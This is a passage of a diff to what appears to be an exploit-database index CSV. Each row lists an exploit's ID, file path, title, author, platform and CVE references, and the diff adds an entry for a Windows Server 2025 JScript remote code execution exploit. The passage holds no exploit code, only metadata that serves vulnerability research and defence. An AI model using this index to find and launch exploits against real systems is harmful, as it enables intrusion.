Godoy",webapps,php,,2012-07-03,2012-07-03,0,OSVDB-83690,,,,, 19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php,,2012-07-05,2012-07-05,0,OSVDB-84678;OSVDB-84677;OSVDB-84676;OSVDB-84675;OSVDB-84674;OSVDB-84673,,,,,https://www.vulnerability-lab.com/get_content.php?id=574 12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php,,2010-04-26,,1,OSVDB-64098;CVE-2010-1660,,,,, @@ -44745,6 +44750,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445,2006-09-12,,1,OSVDB-27845;CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,, 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0008,,,,, 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0009,,,,, +52315,exploits/windows/remote/52315.py,"Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)",2025-06-05,"Mohammed Idrees Banyamer",remote,windows,,2025-06-05,2025-06-05,0,CVE-2025-30397,,,,, 28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows,,2013-09-23,2013-09-23,1,CVE-2013-0810;OSVDB-97136;MS13-071,"Metasploit Framework (MSF)",,,, 46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,,2019-01-22,2019-01-22,0,,,,,, 34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows,,2010-10-25,2014-10-10,1,,,,,,https://www.securityfocus.com/bid/44414/info